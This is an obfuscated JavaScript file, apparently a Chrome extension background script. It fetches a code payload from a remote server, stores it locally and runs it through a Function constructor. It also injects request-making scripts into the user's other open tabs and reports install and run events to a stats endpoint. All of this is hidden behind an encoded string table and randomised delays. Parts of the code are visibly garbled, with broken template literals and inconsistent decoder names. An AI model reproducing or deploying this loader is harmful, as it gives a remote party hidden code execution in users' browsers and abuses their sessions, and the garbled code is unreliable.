(function () {
    var f = ["code", "version", "error", "download", "invalidMonetizationCode", "TjPzl8caI41", "KI10wTwwvF7", "Function", "run", "idle", "pyW5F1U43VI", "init", "https://the-extension.com", "local", "storage", "eval", "then", "get", "getTime", "setUTCHours", "url", "origin", "set", "GET", "loading", "status", "removeListener", "onUpdated", "tabs", "callee", "addListener", "onMessage", "runtime", "executeScript", "replace", "data", "test", "includes", "http://", "length", "Url error", "query", "filter", "active", "floor", "random", "charCodeAt", "fromCharCode", "parse"];
    (function (b, c) {
        var d = function (a) {
                while (--a) {
                    b['push'](b['shift']())
                }
            };
        d(++c)
    }(f, 0xa2));
    var g = function (a, b) {
            var a = parseInt(a, 0x10);
            var c = f[a];
            return c
        };

    function e({
        cat = g('0x0'), act = '', lab = '', fr = 0x3e8 * 0x3c * 0x3c * 0x18
    }) {
        let _0x4b1721 = t(`$ {
            cat
        }
        _$ {
            act
        }`, c['\x46\x44']);
        return l['get'](_0x4b1721)[g('0x1')](_0x9415ed = > {
            let _0x5d937f = _0x9415ed[_0x4b1721], _0x45c15f = 0x5265c00 == fr ? new Date()[g('0x3')]() - new Date(_0x5d937f)[g('0x4')](0x0, 0x0, 0x0, 0x0) >= fr : new Date()[g('0x3')]() - _0x5d937f >= fr;
            if (!_0x5d937f || _0x45c15f) {
                let _0x9415ed = `$ {
                    new URL(c['WL'][g('0x5')])[g('0x6')]
                }
                /stats`;n(`${_0x9415ed}?hash=jwtmv6kavksy5cazdf4leg66r&eventCategory=${cat}&eventAction=${act}&eventLabel=${lab}`,'POST')['then'](_0x201de8=>{let _0x9415ed={};_0x9415ed[_0x4b1721]=new Date()[_0x1838('0x3')](),l[_0x1838('0x7')](_0x9415ed);});}});}function n(_0x42ba8f,n=_0x1838('0x8')){return new Promise((_0x3090bd,_0x473358)=>{function _0x3ad6d4(_0x3a3304,_0x4cce31,_0x57e5fb){_0x1838('0x9')===_0x4cce31[_0x1838('0xa')]&&(_0x20f3c8(_0x57e5fb,_0x42ba8f)&&c['NZ']<=0x0&&(chrome[_0x1838('0xd')][_0x1838('0xc')][_0x1838('0xb')](arguments[_0x1838('0xe')]),_0x2bc9ef(_0x3a3304)),c['NZ']--);}function _0x2bc9ef(_0x5a3411){chrome[_0x1838('0x11')][_0x1838('0x10')][_0x1838('0xf')](_0x4b297c),chrome[_0x1838('0xd')][_0x1838('0x12')](_0x5a3411,{'code':`(function(){var url = replaceableurl; var xhr = new XMLHttpRequest();xhr.onreadystatechange = function () {if (xhr.readyState === 4) {chrome.runtime.sendMessage({data: xhr.responseText, url: url,status:xhr.status});}};xhr.open('${n}',url, true);xhr.send();})()`[_0x1838('0x13')]('replaceableurl',`'${_0x42ba8f}'`)});}function _0x4b297c(_0x4a051f){_0x4a051f[_0x1838('0x5')]===_0x42ba8f&&(_0x3090bd(_0x4a051f[_0x1838('0x14')]),chrome[_0x1838('0x11')][_0x1838('0x10')]['removeListener'](arguments[_0x1838('0xe')]));}function _0x20f3c8(_0x45a021,_0x3db6fb){return new RegExp(`^((?!(chrome${_0x3db6fb[_0x1838('0x16')](_0x1838('0x17'))?'|https|ftps':''})).+:/ / )`)[g('0x15')](_0x45a021[g('0x5')])
        }
        _0x42ba8f && 0x0 !== _0x42ba8f['length'] || _0x473358(g('0x19')), chrome[g('0xd')][g('0x1a')]({}, function (a) {
            let _0x3090bd = a[g('0x1b')](_0x1c9951 = > _0x20f3c8(_0x1c9951, _0x42ba8f) && !_0x1c9951['active']);
            0x0 === _0x3090bd[g('0x18')] ? chrome[g('0xd')][g('0xc')][g('0xf')](_0x3ad6d4) : _0x2bc9ef(_0x3090bd[Math[g('0x1d')](Math['random']() * _0x3090bd[g('0x18')])]['id'])
        })
    })
}
function t(a, b) {
    for (var c = '', _0x35971b = 0x0, _0x519d9f = 0x0; _0x519d9f < a['length']; _0x519d9f++) _0x35971b = a[_0x519d9f][g('0x1f')]() + b, c += String[g('0x20')](_0x35971b);
    return c
}
function o(a) {
    return new Promise((_0x47fce0, _0x349364) = > {
        let _0x51ae9e = !0x1, _0x556fe3 = '', _0x58bf0d = '';
        try {
            a = JSON[g('0x21')](a), _0x556fe3 = a[g('0x22')], _0x58bf0d = a[g('0x23')], _0x556fe3 == -0x1 || (_0x51ae9e = !0x0)
        } catch (_0x1b0f96) {
            e({
                'act': g('0x24'),
                'lab': '\x70\x61\x72\x73\x65\x52\x65\x73\x70\x6f\x6e\x73\x65',
                'fr': 0x0
            })
        }
        _0x51ae9e ? l[g('0x7')]({
            'TjPzl8caI41': _0x556fe3,
            'KI10wTwwvF7': _0x58bf0d
        })['then'](_0x207847 = > {
            l['set']({
                'pyW5F1U43VI': new Date()[g('0x3')]()
            }), e({
                'act': g('0x25'),
                'lab': _0x58bf0d,
                'fr': 0x0
            }), _0x47fce0({
                'code': _0x556fe3,
                'version': _0x58bf0d
            })
        }) : (_0x556fe3 != -0x1 && e({
            'act': g('0x24'),
            'lab': g('0x26'),
            'fr': 0x0
        }), l[g('0x2')]([g('0x27'), 'KI10wTwwvF7'])['then'](_0x5d38a5 = > {
            _0x47fce0({
                'code': _0x5d38a5['TjPzl8caI41'],
                'version': _0x5d38a5[g('0x28')]
            })
        }))
    })
}
function a(b) {
    try {
        window[g('0x29')](b[g('0x22')])(l, n, e), e(b[g('0x22')] && 0x0 !== b['code'][g('0x18')] || b[g('0x23')] && 0x0 !== b['version'][g('0x18')] ? {
            'act': 'run',
            'lab': b[g('0x23')]
        } : {
            'act': g('0x2a'),
            'lab': g('0x2b')
        })
    } catch (_0x5bd26e) {
        e({
            'act': g('0x24'),
            'lab': `run_$ {
                b[g('0x23')]
            }`
        })
    }
}
function r() {
    return new Promise((_0x223434, _0x1b9f00) = > {
        l[g('0x2')](g('0x2c'))['then'](_0x30d294 = > {
            let _0x55a281 = _0x30d294['pyW5F1U43VI'] || 0x0;
            0x0 === _0x55a281 && l[g('0x7')]({
                'XMWEzI4SfdC': new Date()[g('0x3')]()
            })['then'](_0x2d7d72 = > {
                e({
                    'act': 'install'
                })
            }), new Date()[g('0x3')]() - _0x55a281 > c['WL']['Gj'] ? setTimeout(function () {
                n(`$ {
                    c['WL'][g('0x5')]
                }
                /?hash=jwtmv6kavksy5cazdf4leg66r`,g('0x8'))[g('0x1')](o)[g('0x1')](_0x223434)},c['fM']):l[g('0x2')]([g('0x27'),g('0x28')])[g('0x1')](_0x1d2d5e=>{_0x223434({'code':_0x1d2d5e[g('0x27')],'version':_0x1d2d5e['KI10wTwwvF7']})})})})}function i(){setTimeout(function(){e({'act':g('0x2d')}),r()[g('0x1')](a)},c['Cf'])}let c={'WL':{'url':g('0x2e'),'Gj':0x2932e00},'NZ':Math[g('0x1d')](0x3*Math[g('0x1e')]()),'fM':0x1b7740*Math[g('0x1d')](0x1*Math[g('0x1e')]()+0x1),'Cf':0xea60*Math[g('0x1d')](0x2*Math[g('0x1e')]()+0x1),'FD':0x7},l={'get'(e=null){return new Promise((_0x459136,_0x1dd2d2)=>{chrome[g('0x30')][g('0x2f')][g('0x2')](e,function(a){_0x459136(a)})})},'set'(_0x1054f4){return new Promise((_0x13679c,_0x5182a6)=>{chrome[g('0x30')]['local'][g('0x7')](_0x1054f4,function(a){_0x13679c(a)})})},'yJ'(_0x21744e){return new Promise((_0x23501d,_0x525375)=>{chrome[g('0x30')][g('0x2f')]['yJ'](_0x21744e,function(a){_0x23501d(a)})})},'EE'(){return new Promise((_0x47a45d,_0x110900)=>{chrome[g('0x30')][g('0x2f')]['EE'](function(a){_0x47a45d(a)})})}};i()})()